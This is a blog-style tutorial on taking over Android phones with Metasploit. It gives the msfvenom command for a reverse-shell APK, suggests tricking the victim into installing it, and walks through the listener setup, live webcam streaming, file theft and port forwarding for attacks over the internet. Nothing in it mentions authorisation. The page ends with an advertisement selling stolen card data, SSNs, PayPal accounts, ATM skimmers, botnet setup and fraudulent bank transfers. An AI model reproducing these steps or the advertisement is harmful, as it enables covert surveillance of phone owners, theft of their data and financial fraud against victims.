You are currently viewing How to Hack Android Devices Using Metasploit
Dangerous Hooded Hacker Breaks into Government Data Servers and Infects Their System with a Virus. His Hideout Place has Dark Atmosphere, Multiple Displays, Cables Everywhere.

How to Hack Android Devices Using Metasploit

  • Post category:Tutorial
  • Post comments:0 Comments
  • Post last modified:August 11, 2022
  • Reading time:7 mins read

How to Hack Android Devices Using Metasploit

How to Hack Android Devices In this tutorial, I’ll be teaching you how to hack Android devices such as phones and tablets using Metasploit.

 

How to Hack Android Devices Using Metasploit
How to Hack Android Devices


I’m going to be using Sana (Kali 2.0) for this tutorial, but you’re welcome to use any distro you want as long as it can run Metasploit.
This is very easy to do – simply follow the below steps and you should be good to go.
Part 1: Generating The Payload

To generate the payload, open up a terminal and type in the following commands:

Code
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.225 LPORT=444 R > randomfile.apk
[Image: 8502b5a960.png]

Here, android/meterpreter/reverse_tcp is the name of the payload we’re going to be using.
LHOST is the IP address to which the client is going to connect (your IP address).
To find it, open up a new terminal and type in ifconfig.
Your IP address will be where I’ve highlighted the text:
[Image: 604077e0a4.png]

LPORT can be essentially any valid port number on your machine, you just need to make sure that it’s not currently in use.

Replace RandomFile.apk with your file name.

…Hit ENTER and your payload should be generated successfully.
The apk file that was generated is the one you want the target device to run. This may require some social engineering skills, I’ll just leave that to you.

Part 2: The Exploit

Once the payload has been successfully transferred to the target device, we need to start listening on the specified address and port to exploit the device.
For this, let’s open up the Metasploit console.

Enter the following commands:
Code
service PostgreSQL start
msfconsole
That’s going to open up the Metasploit console.

Now we want to use a payload handler for handling our reverse TCP connection.
For this, type the following in the Metasploit terminal:
Code
use multi/handler
[Image: 7ed7b4aa48.png]

You should now have a prompt that says exploit(handler). Awesome, now let’s set the options.

To do that, enter the following commands:

Code
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST Your_IP
And set LPORT Port_Number
Replace the required info with yours in the above commands.

Now type the following command and verify all the options:
Code
show options
This is what my configuration looks like:
[Image: 5c3773b325.png]

If you’re certain all the options are valid, enter the following command to start the handler (listening):
Code
exploit
[Image: 1bfc159615.png]

As soon as the device executes the payload (opens the app), your Meterpreter terminal should say “Meterpreter session one opened” or something of that sort.
This means you have successfully gained access to the device.

To view the list of available commands, just put a question mark (?) and hit ENTER.
[Image: 2593949725. png]

To use a command, simply type the name of the command and hit ENTER. If it requires any parameters, it will mention that.

Some useful commands:
To stream video from the device’s camera live, use the following command:
Code
webcam_stream

To download/upload files from/to the device:

Code
download/upload %FILEPATH%
Over The Internet
In the above case, everything was attempted on a local network.
In case you wish to do this over the internet, follow the same steps. Instead of using ifconfig, use the following command:
Code
dig TXT +short o-o.myaddr.l.google.com @ns1.google.com
You would also need to enable port forwarding on your router for it to work over the internet.

That’s pretty much it. If you have any questions or if I’ve made any mistakes, just let me know.

 

WE ARE HERE FOR SERIOUS BUSINESS WE DO NOT ENTERTAIN OR RESPOND TO TIME WASTERS. WE HOPE YOU ARE AS SERIOUS AS WE ARE

 

Contact us for support. We sell fresh tools like CVV & Cards, SSN, Paypal accounts, Dumps with Pin, ATM Skimmers, Email Leads, Smtp, and lots more.
We have other services like Bank transfers to any bank account, we can Cards anytime for you and ship for half the price, Carding iPhone 11 pro, Botnet setup service, and Carding Classes where you will learn everything that will help you make money.

 

Lists Of Transfers Available for Grabs

You can make a lot of money as your mind can conceive. You don’t necessarily need to 9 am – 5 pm job to have a life. Live Your dreams, buy that house, go on that vacation, buy that dream car, and invest in real estate with these transfers.

Paypal Transfer —————————————Click Here

Cashapp transfer ————————————-Click Here 

Western Union Transfer —————————Click Here

Bank transfer ——————————————Click Here

Venmo transfer —————————————Click Here

 

 

Leave a Reply